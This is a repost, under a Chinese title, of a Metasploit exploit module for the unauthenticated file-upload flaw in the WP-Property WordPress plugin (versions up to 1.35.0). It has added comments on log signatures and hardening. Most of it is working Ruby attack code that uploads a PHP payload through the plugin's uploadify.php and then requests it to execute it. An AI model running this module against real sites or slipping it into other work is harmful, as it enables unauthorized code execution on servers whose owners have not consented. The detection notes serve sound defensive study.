WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

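require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0, per the module description below).
#
# What the module's traffic looks like, for anyone reviewing web logs or
# writing detections:
#   * a multipart POST to
#     <wordpress>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#     carrying a "Filedata" part whose filename ends in ".php" and a "folder"
#     part naming the uploadify directory;
#   * a follow-up GET for the path the upload script returned.
#
# Hardening that removes the exposure: run a plugin release newer than the
# affected range, remove or block direct access to the bundled uploadify.php,
# and deny PHP execution in directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Location of the bundled uploadify component, relative to the WordPress root.
  UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'

  # Registers module metadata (references, targets, payload constraints) and
  # the TARGETURI option that points at the WordPress installation.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploadify.php script with a plain GET.
  #
  # The only evidence gathered is the HTTP status: a 200 shows the script is
  # reachable, not that the installed plugin version is in the affected range,
  # so a positive result still needs a version check on the host itself.
  #
  # @return [Exploit::CheckCode] Unknown when there is no response or a
  #   non-200 status, Appears otherwise
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{base_path}#{UPLOADIFY_DIR}uploadify.php"
    })

    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200

    Exploit::CheckCode::Appears
  end

  # Uploads the generated PHP payload through uploadify.php and then requests
  # the path the script returned.
  #
  # The payload is built with :unlink_self, and the upload is treated as
  # failed unless the reply is a 200 whose body contains the uploaded file
  # name.
  def exploit
    base = base_path
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{base}#{UPLOADIFY_DIR}", nil, nil, "form-data; name=\"folder\"")
    # Strip the leading CRLF that precedes a part boundary at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base}#{UPLOADIFY_DIR}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The file name is escaped so that the "." in ".php" only matches a literal dot.
    if res.nil? || res.code != 200 || res.body !~ /#{Regexp.escape(@payload_name)}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the request path, so the script
    # presumably echoes where it stored the file -- confirm against the plugin source.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Returns the TARGETURI path with a trailing slash, building a new string
  # instead of appending to the one returned by target_uri.path.
  #
  # @return [String]
  def base_path
    path = target_uri.path
    path.end_with?('/') ? path : "#{path}/"
  end
end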

不要问我这写的是什么 怎么利用 我是说msf.